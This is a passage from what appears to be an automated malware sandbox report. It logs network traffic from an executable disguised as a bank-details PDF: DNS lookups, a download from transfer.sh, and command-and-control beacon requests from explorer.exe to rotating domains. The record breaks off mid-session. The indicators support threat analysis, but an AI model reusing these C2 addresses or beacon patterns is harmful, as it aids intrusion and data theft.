                                                Jan 26, 2022 11:59:32.208808899 CET4982980192.168.2.7192.0.78.25
                                                Jan 26, 2022 11:59:32.225208044 CET8049829192.0.78.25192.168.2.7
                                                Jan 26, 2022 11:59:37.277597904 CET4983580192.168.2.7142.250.184.243
                                                Jan 26, 2022 11:59:37.296545982 CET8049835142.250.184.243192.168.2.7
                                                Jan 26, 2022 11:59:37.296634912 CET4983580192.168.2.7142.250.184.243
                                                Jan 26, 2022 11:59:37.296801090 CET4983580192.168.2.7142.250.184.243
                                                Jan 26, 2022 11:59:37.315701008 CET8049835142.250.184.243192.168.2.7
                                                Jan 26, 2022 11:59:37.325843096 CET8049835142.250.184.243192.168.2.7
                                                Jan 26, 2022 11:59:37.325884104 CET8049835142.250.184.243192.168.2.7
                                                Jan 26, 2022 11:59:37.326055050 CET4983580192.168.2.7142.250.184.243
                                                Jan 26, 2022 11:59:37.327240944 CET4983580192.168.2.7142.250.184.243
                                                Jan 26, 2022 11:59:37.346030951 CET8049835142.250.184.243192.168.2.7

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 26, 2022 11:57:44.140566111 CET5432953192.168.2.78.8.8.8
                                                Jan 26, 2022 11:57:44.159792900 CET53543298.8.8.8192.168.2.7
                                                Jan 26, 2022 11:58:58.427715063 CET5191953192.168.2.78.8.8.8
                                                Jan 26, 2022 11:58:58.456464052 CET53519198.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:03.469192982 CET6098353192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:03.506197929 CET53609838.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:08.566284895 CET5228653192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:08.591458082 CET53522868.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:13.692497969 CET5606453192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:14.668628931 CET5606453192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:15.715027094 CET5606453192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:16.249455929 CET53560648.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:16.758861065 CET53560648.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:17.806090117 CET53560648.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:21.267692089 CET6145753192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:21.294740915 CET53614578.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:26.324234009 CET5836753192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:26.355865002 CET53583678.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:32.136260033 CET6059953192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:32.167666912 CET53605998.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:37.224055052 CET5268953192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:37.276293039 CET53526898.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:47.360203981 CET5029053192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:47.537051916 CET53502908.8.8.8192.168.2.7
                                                Jan 26, 2022 11:59:53.235276937 CET6042753192.168.2.78.8.8.8
                                                Jan 26, 2022 11:59:53.395054102 CET53604278.8.8.8192.168.2.7
                                                Jan 26, 2022 12:00:01.971687078 CET5958253192.168.2.78.8.8.8
                                                Jan 26, 2022 12:00:02.028311968 CET53595828.8.8.8192.168.2.7

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Jan 26, 2022 11:59:16.759000063 CET192.168.2.78.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Jan 26, 2022 11:59:17.806274891 CET192.168.2.78.8.8.8cff9(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 26, 2022 11:57:44.140566111 CET192.168.2.78.8.8.80x9316Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:58:58.427715063 CET192.168.2.78.8.8.80x1ad1Standard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:03.469192982 CET192.168.2.78.8.8.80x5f42Standard query (0)www.waktuk.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:08.566284895 CET192.168.2.78.8.8.80x5d8bStandard query (0)www.janhenningsen.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:13.692497969 CET192.168.2.78.8.8.80xe030Standard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:14.668628931 CET192.168.2.78.8.8.80xe030Standard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:15.715027094 CET192.168.2.78.8.8.80xe030Standard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:21.267692089 CET192.168.2.78.8.8.80xf110Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:26.324234009 CET192.168.2.78.8.8.80x4d56Standard query (0)www.quanqiu55555.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:32.136260033 CET192.168.2.78.8.8.80xc828Standard query (0)www.vaughnediting.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:37.224055052 CET192.168.2.78.8.8.80x91cbStandard query (0)www.kamchatka-agency.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:47.360203981 CET192.168.2.78.8.8.80x1b50Standard query (0)www.glenndcp.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:53.235276937 CET192.168.2.78.8.8.80x6d14Standard query (0)www.elektropanjur.comA (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:01.971687078 CET192.168.2.78.8.8.80xcb12Standard query (0)www.brainymortgage.infoA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 26, 2022 11:57:44.159792900 CET8.8.8.8192.168.2.70x9316No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:58:58.456464052 CET8.8.8.8192.168.2.70x1ad1Name error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:03.506197929 CET8.8.8.8192.168.2.70x5f42No error (0)www.waktuk.comwaktuk.comCNAME (Canonical name)IN (0x0001)
                                                Jan 26, 2022 11:59:03.506197929 CET8.8.8.8192.168.2.70x5f42No error (0)waktuk.com95.179.246.125A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:08.591458082 CET8.8.8.8192.168.2.70x5d8bNo error (0)www.janhenningsen.com217.160.0.98A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:16.249455929 CET8.8.8.8192.168.2.70xe030Server failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:16.758861065 CET8.8.8.8192.168.2.70xe030Server failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:17.806090117 CET8.8.8.8192.168.2.70xe030Server failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:21.294740915 CET8.8.8.8192.168.2.70xf110Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:26.355865002 CET8.8.8.8192.168.2.70x4d56No error (0)www.quanqiu55555.com38.143.0.82A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:32.167666912 CET8.8.8.8192.168.2.70xc828No error (0)www.vaughnediting.comvaughnediting.comCNAME (Canonical name)IN (0x0001)
                                                Jan 26, 2022 11:59:32.167666912 CET8.8.8.8192.168.2.70xc828No error (0)vaughnediting.com192.0.78.25A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:32.167666912 CET8.8.8.8192.168.2.70xc828No error (0)vaughnediting.com192.0.78.24A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:37.276293039 CET8.8.8.8192.168.2.70x91cbNo error (0)www.kamchatka-agency.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                Jan 26, 2022 11:59:37.276293039 CET8.8.8.8192.168.2.70x91cbNo error (0)ghs.googlehosted.com142.250.184.243A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:47.537051916 CET8.8.8.8192.168.2.70x1b50No error (0)www.glenndcp.com164.155.212.161A (IP address)IN (0x0001)
                                                Jan 26, 2022 11:59:53.395054102 CET8.8.8.8192.168.2.70x6d14No error (0)www.elektropanjur.com209.99.40.222A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)www.brainymortgage.infoparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                Jan 26, 2022 12:00:02.028311968 CET8.8.8.8192.168.2.70xcb12No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • transfer.sh
                                                • www.waktuk.com
                                                • www.janhenningsen.com
                                                • www.quanqiu55555.com
                                                • www.vaughnediting.com
                                                • www.kamchatka-agency.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.749756144.76.136.153443C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.749757144.76.136.153443C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.74980695.179.246.12580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 26, 2022 11:59:03.533366919 CET10431OUTGET /be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8 HTTP/1.1
                                                Host: www.waktuk.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 26, 2022 11:59:03.555804968 CET10432INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 26 Jan 2022 10:59:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://waktuk.com/be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.749821217.160.0.9880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 26, 2022 11:59:08.622078896 CET18927OUTGET /be4o/?M0Gdwp1p=MXCJfAinsdUT0nhhknsrtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuF+1kPk8mbaZ3X+7FQ==&xN9=9rHpFJex8 HTTP/1.1
                                                Host: www.janhenningsen.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 26, 2022 11:59:08.651669025 CET18927INHTTP/1.1 404 Not Found
                                                Content-Type: text/html
                                                Content-Length: 601
                                                Connection: close
                                                Date: Wed, 26 Jan 2022 10:59:08 GMT
                                                Server: Apache
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.74982838.143.0.8280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 26, 2022 11:59:26.541975975 CET20782OUTGET /be4o/?M0Gdwp1p=yMGLhnybay5mZd/ZPFkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsijaPEOonxtzUinVLZQ==&xN9=9rHpFJex8 HTTP/1.1
                                                Host: www.quanqiu55555.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 26, 2022 11:59:26.744554996 CET20783INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 26 Jan 2022 10:59:26 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 31 64 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0d 0a 20 20
                                                Data Ascii: 1d20<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{
                                                Jan 26, 2022 11:59:26.744652987 CET20784INData Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74
                                                Data Ascii: cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-decor
                                                Jan 26, 2022 11:59:26.744757891 CET20786INData Raw: 2e 65 78 63 65 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 20 2e 6d 65 73 73 61 67
                                                Data Ascii: .exception { margin-top: 20px; } .exception .message{ padding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16
                                                Jan 26, 2022 11:59:26.744883060 CET20787INData Raw: 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38
                                                Data Ascii: rder-left: 1px solid #ddd; height: 18px; line-height: 18px; } .exception .source-code pre code{ color: #333; height: 100%; display: inline-block; b
                                                Jan 26, 2022 11:59:26.744930029 CET20789INData Raw: 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 63 61 70 74 69 6f 6e 20 73 6d 61 6c 6c 7b
                                                Data Ascii: padding: 6px 0; } .exception-var table caption small{ font-weight: 300; display: inline-block; margin-left: 10px; color: #ccc; } .exception-var
                                                Jan 26, 2022 11:59:26.744956017 CET20790INData Raw: 7b 20 63 6f 6c 6f 72 3a 20 23 30 36 36 20 7d 20 20 2f 2a 20 61 20 6c 69 74 65 72 61 6c 20 76 61 6c 75 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 70 75 6e 63 74 75 61 74 69 6f 6e 2c 20 6c 69 73 70 20 6f 70 65 6e 20 62 72 61 63 6b 65 74 2c
                                                Data Ascii: { color: #066 } /* a literal value */ /* punctuation, lisp open bracket, lisp close bracket */ pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 } pre.prettyprint .tag { color: #008 } /


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.749829192.0.78.2580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 26, 2022 11:59:32.186250925 CET20791OUTGET /be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8 HTTP/1.1
                                                Host: www.vaughnediting.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 26, 2022 11:59:32.208456993 CET20791INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 26 Jan 2022 10:59:32 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://www.vaughnediting.com/be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8
                                                X-ac: 2.hhn _dfw
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.749835142.250.184.24380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 26, 2022 11:59:37.296801090 CET20808OUTGET /be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex8 HTTP/1.1
                                                Host: www.kamchatka-agency.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 26, 2022 11:59:37.325843096 CET20810INHTTP/1.1 301 Moved Permanently
